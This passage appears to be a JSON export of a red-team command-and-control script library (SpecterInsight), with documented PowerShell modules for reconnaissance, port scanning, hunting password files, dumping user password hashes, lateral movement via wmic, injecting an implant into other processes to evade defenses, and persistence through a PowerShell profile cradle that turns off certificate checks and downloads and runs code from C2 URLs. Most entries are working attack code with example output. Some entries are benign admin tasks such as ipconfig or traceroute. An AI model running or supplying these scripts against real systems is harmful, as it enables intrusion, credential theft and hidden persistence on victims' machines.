@{\r\n        Method = 'System Sevice';\r\n        Profile = 'System';\r\n        Trigger = 'OnStart';\r\n        Event = 'Delete';\r\n        Build = '$Build';\r\n        Payload = '$Payload';\r\n        Path = '$localBinaryPath';\r\n        Success = `$success;\r\n    };\r\n};\r\n\"@;\r\n    };\r\n};",
    "version": 9,
    "isPremium": true,
    "labels": [
      "api",
      "event-triggered-execution",
      "persistence",
      "service-execution",
      "system-services",
      "windows",
      "windows-service"
    ],
    "enabled": true
  },
  {
    "identifier": "aa36da9368e34ba9922e2d3c4711c28e",
    "name": "Find Password Files",
    "description": "Finds files that might have passwords in them.",
    "documentation": "# Overview\r\n\r\nThis script looks for any file with the word password in the filename or any file with a xml, ini, or txt extension with the word password in it.\r\n\r\n# Example Output\r\n\r\n```\r\nLength LastAccessTimeUtc      FullName\r\n------ -----------------      --------\r\n271951 12/18/2022 1:41:26 PM  C:\\Users\\helpdesk\\AppData\\Local\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\passwords.txt\r\n271951 12/18/2022 1:33:07 PM  C:\\Users\\helpdesk\\AppData\\Local\\Microsoft\\VisualStudio\\WebView2Cache\\0000\\EBWebView\\ZxcvbnData\\3.0.0.0\\passwords.txt\r\n    43 12/16/2022 6:27:55 AM  C:\\Users\\helpdesk\\Desktop\\Workspace\\passwords.txt\r\n```",
    "scriptBlock": "load recon;\r\n\r\n$results = New-Object System.Collections.ArrayList;\r\n\r\n#List all files with password in the file name\r\n$files = Get-Files -Path \"C:\\Users\\\" -Filter \".*password.*\" -Recurse;\r\nforeach($file in $files) {\r\n    $info = New-Object System.IO.FileInfo($file);\r\n    [void]$results.Add($info);\r\n}\r\n\r\n#List all files with xml, ini, or txt extensions with the word password in then\r\n$files = Get-Files -Path \"C:\\Users\\\" -Filter \".*[.]txt\",\".*[.]xml\",\".*[.]ini\" -Recurse;\r\n$options = [System.Text.RegularExpressions.RegexOptions]::Compiled;\r\n$options += [System.Text.RegularExpressions.RegexOptions]::IgnoreCase\r\n$regex = New-Object System.Text.RegularExpressions.Regex(\"((password)|(passwd))\", $options);\r\nforeach($file in $files) {\r\n    $info = New-Object System.IO.FileInfo($file);\r\n    if($info.Length -gt 5242880) {\r\n        continue;\r\n    }\r\n\r\n    $text = [System.IO.File]::ReadAllText($info.FullName);\r\n    if($regex.IsMatch($text)) {\r\n        [void]$results.Add($info);\r\n    }\r\n}\r\n\r\n$results | Select Length,LastAccessTimeUtc,FullName | Sort LastAccessTimeUtc -Descending;",
    "version": 1,
    "isPremium": true,
    "labels": [],
    "enabled": true
  },
  {
    "identifier": "6aed44520fc04a1d82a20a879491e52e",
    "name": "Get Antivirus Information",
    "description": "Shows basic Antivirus engine information using WMI queries.",
    "documentation": "# Overview\r\n\r\nShows the name, product path, and reporter path for the installed Antivirus engine.\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Text Output\r\n\r\n```\r\nName             ProductPath        ReporterPath\r\n----             -----------        ------------\r\nWindows Defender windowsdefender:// %ProgramFiles%\\Windows Defender\\MsMpeng.exe\r\n```\r\n\r\n# Example Json Output\r\n\r\n```json\r\n{\r\n  \"Name\": \"Windows Defender\",\r\n  \"ProductPath\": \"windowsdefender://\",\r\n  \"ReporterPath\": \"%ProgramFiles%\\\\Windows Defender\\\\MsMpeng.exe\"\r\n}\r\n```",
    "scriptBlock": "load recon;\r\n\r\nav",
    "version": 1,
    "isPremium": true,
    "labels": [
      "discovery",
      "host-discovery",
      "passive",
      "security-software-discovery",
      "software-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "9f1c06d74c654c34850deecf89aca76b",
    "name": "Disable Remote Desktop Protocol (RDP) via API",
    "description": "Disables Remote Desktop Protocol (RDP) and disables the rule allowing inbound RDP Connections through the firewall.",
    "documentation": "# Overview\r\n\r\nThis script disables Remote Desktop Protocol (RDP) by setting the following registry value:\r\n\r\n- **Path:** HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server\r\n- **Name:** fDenyTSConnections\r\n- **Value:** 1\r\n\r\nNext, the script blocks RDP through the firewall by disabling the built-in rule \"Remote Desktop\".\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites:\r\n\r\n- Administrator or SYSTEM privileges.",
    "scriptBlock": "Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server' -Name \"fDenyTSConnections\" -Value 1\r\nDisable-NetFirewallRule -DisplayGroup \"Remote Desktop\"",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "db1fbb6d36264d9b8f67131ebd6efa25",
    "name": "Remote Command using WMI via Commandline",
    "description": "The script will run a command on a remote system using wmic.exe.",
    "documentation": "# Overview\r\n\r\nThis script leverages the Windows Management Instrumentation Commandline utility or wmic to run a command on a remote system using either impersonation of the current user or explicit credentials.\r\n\r\nWMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access with the latter leveraging the Distributed Component Object Model (DCOM). Remote WMI over DCOM operates using port 135.\r\n\r\n# Dependencies\r\n\r\n* None\r\n\r\n# Employment Considerations\r\n\r\n* Impersonation requires that the current user have access to the remote system.\r\n* This script throws one error if successful. Not entirely sure why.\r\n* You will not receive any output from the executed command using this mechanism.\r\n\r\n# Example Text Output\r\n\r\nExample of successful execution.\r\n\r\n```\r\nExecuting (Win32_Process)->Create()\r\n\r\nMethod execution successful.\r\n\r\nOut Parameters:\r\ninstance of __PARAMETERS\r\n{\r\n\tProcessId = 5116;\r\n\tReturnValue = 0;\r\n};\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the command.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the command.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Target,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The command to run on the target system.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The command to run on the target system.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Command\r\n)\r\n\r\n#Shell escape any embedded slashes\r\n$Command = $Command.Replace('\\', '\\\\');\r\n$Command = $Command.Replace('\"', '\\\"');\r\n\r\n#Execute command on remote system using WMI commandline executable\r\nif(![String]::IsNullOrEmpty($Username) -and $Password -ne $null) {\r\n    #Run with explicit credentials\r\n    wmic.exe /node:$Target /user:$Username /password:$Password process call create $Command\r\n} else {\r\n    #Run with impersonation\r\n    wmic.exe /node:$Target process call create $Command\r\n}",
    "version": 7,
    "isPremium": true,
    "labels": [
      "command-line",
      "execution",
      "lateral-movement",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "3488ec69ec9647728d1a899df8c3787e",
    "name": "Get TraceRoute via API",
    "description": "Gets a list of hops to the destination via TraceRoute ICMP technique.",
    "documentation": "# Overview\r\n\r\nGets a list of router hops between the current system and the target.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Output\r\n\r\n```\r\ndst_host     next_ip        previous_ip    interface\r\n--------     -------        -----------    ---------\r\nwww.xkcd.com 192.168.1.1    192.168.1.101  Ethernet1\r\nwww.xkcd.com 10.200.75.1    192.168.1.1    Ethernet1\r\nwww.xkcd.com 10.0.0.1       10.200.75.1    Ethernet1\r\nwww.xkcd.com 10.101.48.1    10.0.0.1       Ethernet1\r\nwww.xkcd.com 100.127.4.38   10.101.48.1    Ethernet1\r\nwww.xkcd.com 100.120.102.22 100.127.4.38   Ethernet1\r\nwww.xkcd.com 68.1.4.252     100.120.102.22 Ethernet1\r\nwww.xkcd.com 0.0.0.0        68.1.4.252     Ethernet1\r\nwww.xkcd.com 151.101.64.67  0.0.0.0        Ethernet1\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The hostname or IP address of the target.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Target = 'www.xkcd.com'\r\n)\r\n\r\n$results = Test-NetConnection -TraceRoute $Target\r\nif(!$results.PingSucceeded) {\r\n    return;\r\n}\r\n\r\n$previous = $results.SourceAddress.IPAddress;\r\nforeach($hop in $results.TraceRoute) {\r\n    New-Object PSObject -Property @{\r\n        'dst_host' = $results.ComputerName;\r\n        'interface' = $results.InterfaceAlias;\r\n        'previous_ip' = $previous;\r\n        'next_ip' = $hop;\r\n    }\r\n    $previous = $hop\r\n}",
    "version": 2,
    "isPremium": true,
    "labels": [
      "active",
      "api",
      "linux",
      "mac",
      "recon",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "549dd49453dc44d7b68d24d86ede5bb5",
    "name": "Get Windows Interfaces via Commandline",
    "description": "Runs ipconfig to show the local network interfaces.",
    "documentation": "# Overview\r\n\r\nUses the ipconfig command to show the local network interfaces configuration.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nWindows IP Configuration\r\n\r\n   Host Name . . . . . . . . . . . . : DESKTOP-LMCH70V\r\n   Primary Dns Suffix  . . . . . . . :\r\n   Node Type . . . . . . . . . . . . : Hybrid\r\n   IP Routing Enabled. . . . . . . . : No\r\n   WINS Proxy Enabled. . . . . . . . : No\r\n   DNS Suffix Search List. . . . . . : localdomain\r\n                                       home.arpa\r\n\r\nEthernet adapter Ethernet0:\r\n\r\n   Connection-specific DNS Suffix  . : localdomain\r\n   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection\r\n   Physical Address. . . . . . . . . : 00-0C-29-76-5E-EE\r\n   DHCP Enabled. . . . . . . . . . . : Yes\r\n   Autoconfiguration Enabled . . . . : Yes\r\n   Link-local IPv6 Address . . . . . : fe80::e291:3de2:b903:b8ac%10(Preferred)\r\n   IPv4 Address. . . . . . . . . . . : 192.168.132.135(Preferred)\r\n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n   Lease Obtained. . . . . . . . . . : Tuesday, January 23, 2024 6:28:38 PM\r\n   Lease Expires . . . . . . . . . . : Thursday, January 25, 2024 10:26:28 AM\r\n   Default Gateway . . . . . . . . . : 192.168.132.2\r\n   DHCP Server . . . . . . . . . . . : 192.168.132.254\r\n   DHCPv6 IAID . . . . . . . . . . . : 100666409\r\n   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-60-61-B0-00-0C-29-76-5E-EE\r\n   DNS Servers . . . . . . . . . . . : 192.168.132.2\r\n   Primary WINS Server . . . . . . . : 192.168.132.2\r\n   NetBIOS over Tcpip. . . . . . . . : Enabled\r\n```",
    "scriptBlock": "ipconfig /all",
    "version": 3,
    "isPremium": true,
    "labels": [
      "command-line",
      "discovery",
      "host-discovery",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "5cbb39108ffb45e1afec7dd51960eba9",
    "name": "Get Computers and IP Addresses in Active Directory",
    "description": "This script queries the local Active Directory instance for the FQDN, IP addresses, and OS Version of each computer in Active Directory.",
    "documentation": "# Overview\r\n\r\nThis script leverages the built-in ManagementObjectSearcher class to query the Active Directory domain that the current workstation is a member of for all computers and pulls the following information:\r\n\r\n- Fully Qualified Domain Name\r\n- Operating System\r\n- Version\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nFQDN             OS                                      Version      IPAddresses\r\n----             --                                      -------      -----------\r\nDC1.lab.net      Windows Server 2019 Standard Evaluation 10.0 (17763) 192.168.1.2\r\nWKST-001.lab.net Windows 10 Pro                          10.0 (19044) {fe80::4d29:4f21:ff5:d73f%5, 192.168.1.103}\r\nWKST-002.lab.net Windows 10 Pro                          10.0 (19044) 192.168.1.102\r\nWKST-003.lab.net Windows 10 Pro                          10.0 (19044) 192.168.1.101\r\n```",
    "scriptBlock": "load recon;\r\n\r\n$computers = computers;\r\nforeach($computer in $computers) {\r\n    if($computer -eq $null) {\r\n        continue;\r\n    }\r\n\r\n    $addresses = @();\r\n    try {\r\n        $addresses = New-Object System.Collections.ArrayList\r\n        [System.Net.Dns]::GetHostEntry($computer.FQDN).AddressList | % { [void]$addresses.Add($_.ToString()); };\r\n    } catch { }\r\n    $computer | Add-Member -MemberType NoteProperty -Name \"IPAddresses\" -Value $addresses;\r\n}\r\n$computers",
    "version": 2,
    "isPremium": true,
    "labels": [
      "active",
      "active-directory",
      "discovery",
      "network-discovery",
      "remote-system-discovery"
    ],
    "enabled": true
  },
  {
    "identifier": "d42035032bb74d0e8aa9802978f1ae9f",
    "name": "Migrate Process",
    "description": "Injects a specter into the specified process.",
    "documentation": "# Overview\r\n\r\nThis script injects a specter into another running process for the purpose of defense evasion or privilege escalation. The target process can be specified by either PID or name. If migratng by name, the first matching process will be injected, and all remaining processes will be ignored. The architecture of the shellcode will be selected based on the bitness of the target process (i.e. if the target process is 32-bit, then the shellcode selected will be x86. After succesful injection, there will be two total sessions.\r\n\r\n# Dependencies\r\n\r\n* Lateral\r\n\r\n# Limitations\r\n\r\n* Cannot inject from a 32-bit process to a 64-bit process.\r\n\r\n# Example Text Output\r\n\r\nExample of successful injection.\r\n\r\n```\r\nSuccess  PID Build\r\n-------  --- -----\r\n   True 6576 29e61f72f90841a9909fbeb18f915d6c\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name or PID of the target process to inject Specter shellcode. If using a process name, the first matching instance will be injected with a Specter while any remaining matches will be ignored.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Process = 'explorer'\r\n)\r\n\r\n#Load dependencies\r\nload lateral;\r\n\r\ntry {\r\n    $procid = [Int32]::Parse($Process)\r\n    Migrate-Process -PID $procid\r\n} catch {\r\n    Migrate-Process -Name $Process\r\n}",
    "version": 5,
    "isPremium": true,
    "labels": [
      "defense-evasion",
      "privilege-escalation"
    ],
    "enabled": true
  },
  {
    "identifier": "516a2a46d7704e308b1e219a4ade3794",
    "name": "Port Scan Target System",
    "description": "Scan a few targets with a broad range of ports.",
    "documentation": "# Overview\r\n\r\nThe purpose of this script is to scan a few target IP addresses or CIDR networks with a broad range of common ports.\r\n\r\n# Inputs\r\n\r\n**Targets:** A list of IP addresses or CIDR ranges to scan (e.g. 10.0.0.14 or 192.168.0.0/24).\r\n\r\n**Ports:** A list of ports to scan. The default ports are 21, 22, 23, 25, 53, 80, 88, 111, 139, 389, 443, 445, 873, 1099, 1433, 1521, 1723, 2049, 2100, 2121, 3299, 3306, 3389, 3632, 4369, 5038, 5060, 5432, 5555, 5900, 5985, 6000, 6379, 6667, 8000, 8080, 8443, 9200, and 27017.\r\n\r\n# Example Output\r\n\r\n```\r\nIPAddress : 10.0.0.14\r\n21        : Filtered\r\n22        : Filtered\r\n23        : Filtered\r\n25        : Filtered\r\n53        : Filtered\r\n80        : Open\r\n88        : Filtered\r\n111       : Filtered\r\n139       : Open\r\n389       : Filtered\r\n443       : Filtered\r\n445       : Open\r\n873       : Filtered\r\n1099      : Filtered\r\n1433      : Filtered\r\n1521      : Filtered\r\n1723      : Filtered\r\n2049      : Filtered\r\n2100      : Filtered\r\n2121      : Filtered\r\n3299      : Filtered\r\n3306      : Filtered\r\n3389      : Open\r\n3632      : Filtered\r\n4369      : Filtered\r\n5038      : Filtered\r\n5060      : Filtered\r\n5432      : Filtered\r\n5555      : Filtered\r\n5900      : Filtered\r\n5985      : Filtered\r\n6000      : Filtered\r\n6379      : Filtered\r\n6667      : Filtered\r\n8000      : Filtered\r\n8080      : Filtered\r\n8443      : Filtered\r\n9200      : Filtered\r\n27017     : Filtered\r\n```\r\n\r\n",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"A comma-separated list of domain names, IPs, or IP ranges to scan.\")]\r\n    [string[]]$Targets = @('10.0.0.14'),\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"A comma-separated list of ports to scan.\")]\r\n    [int[]]$Ports = @(21, 22, 23, 25, 53, 80, 88, 111, 139, 389, 443, 445, 873, 1099, 1433, 1521, 1723, 2049, 2100, 2121, 3299, 3306, 3389, 3632, 4369, 5038, 5060, 5432, 5555, 5900, 5985, 6000, 6379, 6667, 8000, 8080, 8443, 9200, 27017)\r\n)\r\n\r\nload recon;\r\n\r\nscan -Targets $Targets -Ports $Ports;",
    "version": 3,
    "isPremium": true,
    "labels": [
      "active",
      "api",
      "discovery",
      "linux",
      "mac",
      "network-discovery",
      "network-service-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "2f74242f504c493ca884d72eaa201f1e",
    "name": "Persistence with PowerShell Profile and PowerShell Cradle",
    "description": "Establishes user or system level persistence by creating or overwriting a PowerShell profile and inserting an Specter cradle.",
    "documentation": "# Overview\r\n\r\nA PowerShell profile is a script that runs when PowerShell starts. You can use the profile as a logon script to customize the environment, or in our case for persistent access. This script establishes user or system level persistence by creating or overwriting a PowerShell profile and inserting an Specter cradle. The operator can specify either a \"User\" or \"System\" profile. The \"User\" profile corresponds to the Current User, All Hosts profile. The \"System\" profile corresponds to the All Users, All Hosts profile and requires Administrator privileges to modify.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- If using the System profile, Current user must be a member of the Administrators group.\r\n\r\n# Employment Considerations\r\n\r\n- If a lot of scripts are being executed on the target system, the  you may flood the C2 server with too many implant callbacks and duplicate sessions. It may be worth building an implant to burnoff if a Specter is already running.\r\n\r\n# Example Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"Persistence\": {\r\n      \"Id\": \"2ba39fdc872b4f4e9c3635ff1cdc182f\",\r\n      \"Method\": \"PowerShell Profile\",\r\n      \"Trigger\": \"PowerShell Host Startup\",\r\n      \"Build\": \"92cbf1b0f92642859f28f258226cc1f3\",\r\n      \"Profile\": \"User\",\r\n      \"Event\": \"Create\",\r\n      \"Success\": true,\r\n      \"UninstallScript\": \"\",\r\n      \"UninstallScript\": \"try {\\r\\n\\t[System.IO.File]::Delete('C:\\\\Users\\\\helpdesk\\\\Documents\\\\WindowsPowerShell\\\\profile.ps1');\\r\\n\\t$success = $true;\\r\\n} catch {\\r\\n\\t$success = $false;\\r\\n\\tthrow;\\r\\n}\\r\\n\\r\\nNew-Object PSObject -Property @{\\r\\n\\tPersistence = New-Object PSObject -Property @{\\r\\n\\t\\tId = \\\"1724650fe73f4328b127d015631e34e3\\\";\\r\\n\\t\\tEvent = \\\"Delete\\\";\\r\\n\\t\\tSuccess = $success;\\r\\n\\t    Method = \\\"PowerShell Profile\\\";\\r\\n\\t    Profile = \\\"User\\\";\\r\\n\\t    Trigger = \\\"PowerShell Host Startup\\\";\\r\\n\\t}\\r\\n}\",\r\n      \"ProfilePath\": \"C:\\\\Users\\\\helpdesk\\\\Documents\\\\WindowsPowerShell\\\\profile.ps1\"\r\n    }\r\n  }\r\n]\r\n```\r\n\r\n# References\r\n\r\n- [https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles)\r\n- [https://pentestlab.blog/2019/11/05/persistence-powershell-profile/](https://pentestlab.blog/2019/11/05/persistence-powershell-profile/)",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The PowerShell profile type to use for persistence. The User profile will only run when PowerShell instances are created under the context of the current user.\")]\r\n    [ValidateSet('User', 'System')]\r\n    [string]$Profile = 'User',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\n\r\ntry {\r\n\t#Get the URLs for the cradle generator\r\n\t$urls = (payload -Build $Build -Kind 'ps_url' | % { \"'$_'\" }) -Join \", \";\r\n\t\r\n\t#Code to insert into the PowerShell profile\r\n\t$cradle = @\"\r\n[Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};\r\n`$urls = @($urls);\r\nforeach(`$url in `$urls) {\r\n\ttry {\r\n\t\t`$args = (New-Object Net.WebClient).DownloadString(`$url);\r\n\t\t`$block = [Scriptblock]::Create(`$args);\r\n\t\tStart-Job `$block | Out-Null;\r\n\t\texit;\r\n\t} catch { }\r\n}\r\n\"@;\r\n\t\r\n\t#Get the right path\r\n\tif($Profile -eq \"System\") {\r\n\t    $path = \"$PSHOME\\Profile.ps1\";\r\n\t} else {\r\n\t    $path = \"$HOME\\Documents\\WindowsPowerShell\\profile.ps1\";\r\n\t}\r\n\t\r\n\t#Ensure the parent directory exists\r\n\t$directory = [IO.Path]::GetDirectoryName($path);\r\n\tif(![IO.Directory]::Exists($directory)) {\r\n\t    [void][IO.Directory]::CreateDirectory($directory);\r\n\t}\r\n\t\r\n\t#Overwrite the current profile\r\n\t[IO.File]::WriteAllText($path, $cradle);\r\n\t$success = $true;\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\n#Log output\r\n$id = [Guid]::NewGuid().ToString().Replace(\"-\", \"\");\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = $id;\r\n\t\tEvent = \"Create\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"PowerShell Profile\";\r\n\t    Profile = $Profile;\r\n\t    Trigger = \"PowerShell Host Startup\";\r\n\t    Build = $Build;\r\n\t    ProfilePath = $path;\r\n\t    UninstallScript = @\"\r\ntry {\r\n\t[System.IO.File]::Delete('$path');\r\n\t`$success = `$true;\r\n} catch {\r\n\t`$success = `$false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"$id\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = `$success;\r\n\t    Method = \"PowerShell Profile\";\r\n\t    Profile = \"$Profile\";\r\n\t    Trigger = \"PowerShell Host Startup\";\r\n\t}\r\n}\r\n\"@;\r\n\t}\r\n}",
    "version": 4,
    "isPremium": true,
    "labels": [
      "api",
      "event-triggered-execution",
      "persistence",
      "powershell-profile",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "54176cc0d7b240f2adbc38ea5bce992a",
    "name": "Port Scan Local Network",
    "description": "Runs a full tcp connect port scan on all local networks.",
    "documentation": "# Overview\r\n\r\nThis script performs a full TCP connect scan against oll local area networks using a default set of ports. IP subnets are selected by identifying interfaces on the host that meet the following criteria:\r\n\r\n* Interface is in the up state.\r\n* There are greater than 2 ARP entries on the interface.\r\n* Subjet has a CIDR greater than or equal to /23 (512 IP addresses).\r\n\r\nThe default ports scanned are: 21, 22, 23, 25, 80, 135, 161, 389, 443, 445, and 3389\r\n\r\n# Example Text Output\r\n\r\n```\r\n21      : Filtered\r\n22      : Filtered\r\n23      : Filtered\r\n25      : Filtered\r\n80      : Open\r\n135     : Filtered\r\n161     : Filtered\r\n389     : Filtered\r\n443     : Open\r\n445     : Filtered\r\n3389    : Filtered\r\nNetwork : 192.168.1.0/24\r\nIP      : 192.168.1.1\r\n```\r\n\r\n# Example Json Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"21\": \"Filtered\",\r\n    \"22\": \"Filtered\",\r\n    \"23\": \"Filtered\",\r\n    \"25\": \"Filtered\",\r\n    \"80\": \"Open\",\r\n    \"135\": \"Filtered\",\r\n    \"161\": \"Filtered\",\r\n    \"389\": \"Filtered\",\r\n    \"443\": \"Open\",\r\n    \"445\": \"Filtered\",\r\n    \"3389\": \"Filtered\",\r\n    \"Network\": \"192.168.1.0/24\",\r\n    \"IP\": \"192.168.1.1\",\r\n    \"Session\": {\r\n      \"MachineId\": \"dfec7175a6a62757d83b93794df767d5acfadb82\",\r\n      \"SessionId\": \"9525f2ec5c4a4920b7b8fe3ff56aa51d\",\r\n      \"FQDN\": \"DESKTOP-LMCH70V\",\r\n      \"IP\": \"::1\",\r\n      \"OS\": \"Windows 10.0.19045\",\r\n      \"Username\": \"DESKTOP-LMCH70V\\\\helpdesk\",\r\n      \"PID\": 8672,\r\n      \"Path\": \"C:\\\\Users\\\\helpdesk\\\\Desktop\\\\Workspace\\\\repos\\\\SpecterInsight\\\\src\\\\release\\\\implants\\\\1fe0b18153764e549b04928e79fc288f\\\\x64\\\\WinNativeExe.exe\"\r\n    }\r\n  }\r\n]\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"A comma-separated list of ports to scan.\")]\r\n    [int[]]$Ports = @(21, 22, 23, 25, 80, 135, 161, 389, 443, 445, 3389),\r\n    \r\n    [Parameter(Mandatory = $true, HelpMessage = \"The number of cuncurrent threads to use for parallel scanning.\")]\r\n    [int]$ThreadCount = 128,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The TCP timeout value in milliseconds.\")]\r\n    [int]$Timeout = 1250\r\n)\r\n\r\nload recon;\r\n\r\n$interfaces = interfaces;\r\n\r\n$networks = New-Object 'System.Collections.Generic.Dictionary[string,string]'\r\nforeach($interface in $interfaces) {\r\n\t#Network must be Up to scan\r\n\tif($interface.Status -ne 'Up') {\r\n\t\tcontinue;\r\n\t}\r\n\t\r\n\t#Must have 3 or more valid arp entries\r\n\tif($interface.Entries.Count -le 2) {\r\n\t\tcontinue;\r\n\t}\r\n\t\r\n\t#Each interface can have multiple IP addresses\r\n\tforeach($network in $interface.InterfaceIPs) {\r\n\t\ttry {\r\n\t\t\t$subnet = [common.Networking.IPNetwork]::Parse($network.IP, $network.Netmask);\r\n\t\t} catch {\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\t\r\n\t\t#We don't want to scan too many addresses\r\n\t\tif($subnet.Cidr -lt 23) {\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\t\r\n\t\t#Ignore duplicate networks\r\n\t\t$subnetstr = $subnet.ToString();\r\n\t\tif(!$networks.ContainsKey($subnetstr)) {\r\n\t\t\t$networks.Add($subnetstr, $subnetstr);\r\n\t\t}\r\n\t}\r\n}\r\n\r\n#Scan each network\r\nforeach($network in $networks.Keys) {\r\n\t$results = scan $network -Ports $Ports -ThreadCount $ThreadCount -Timeout $Timeout;\r\n\t$results | Add-Member -MemberType NoteProperty -Name \"Network\" -Value $network;\r\n\tforeach($result in $results) {\r\n\t\t$result | Add-Member -MemberType NoteProperty -Name \"IP\" -Value $result.IPAddress;\r\n\t}\r\n\t$results | select * -Exclude IPAddress;\r\n}",
    "version": 3,
    "isPremium": true,
    "labels": [
      "active",
      "api",
      "discovery",
      "linux",
      "mac",
      "network-discovery",
      "network-service-discovery",
      "remote-system-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "0edf3b95bf0546dbb084777ba6752feb",
    "name": "Dump User Hashes",
    "description": "Dump user password hashes using DPAPI.",
    "documentation": "# Overview\r\n\r\nDump user password hashes using DPAPI.\r\n\r\n# Dependencies\r\n\r\n- credentials\r\n\r\n# Pre-requisites\r\n\r\n- High Integrity process\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example\r\n\r\n```\r\nDomainName : DESKTOP-LMCH70V\r\nUserName   : helpdesk\r\nLm         : 00000000000000000000000000000000\r\nNtlm       : bc007082d32777855e253fd4defe70ee\r\nSha1       : c44e77aa5d3caed6ca7e9e59f553fe64ce4000d2\r\nDpapi      : 00000000000000000000000000000000\r\n```",
    "scriptBlock": "load credentials;\r\n\r\nhashdump",
    "version": 1,
    "isPremium": true,
    "labels": [
      "credential-harvesting",
      "passive",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "ed8be86ceb2b40cbb2adcef672178b09",
    "name": "Get Local Users via API",
    "description": "Gets a list of local users via the API.",
    "documentation": "# Overview\r\n\r\nGets a list of local users along with the following information:\r\n\r\n- Enabled\r\n- Rid\r\n- UserType\r\n- Comment\r\n- PwdLastSet\r\n- LastLogon\r\n- NumLogins\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nComputerName : localhost\r\nUserName     : Administrator\r\nEnabled      : False\r\nRid          : 500\r\nUserType     : Administrator\r\nComment      : Built-in account for administering the computer/domain\r\nPwdLastSet   : 1/1/1970 12:00:00 AM\r\nLastLogon    : 1/1/1970 12:00:00 AM\r\nNumLogins    : 0\r\n\r\nComputerName : localhost\r\nUserName     : DefaultAccount\r\nEnabled      : False\r\nRid          : 503\r\nUserType     : Guest\r\nComment      : A user account managed by the system.\r\nPwdLastSet   : 1/1/1970 12:00:00 AM\r\nLastLogon    : 1/1/1970 12:00:00 AM\r\nNumLogins    : 0\r\n\r\nComputerName : localhost\r\nUserName     : Guest\r\nEnabled      : False\r\nRid          : 501\r\nUserType     : Guest\r\nComment      : Built-in account for guest access to the computer/domain\r\nPwdLastSet   : 1/1/1970 12:00:00 AM\r\nLastLogon    : 1/1/1970 12:00:00 AM\r\nNumLogins    : 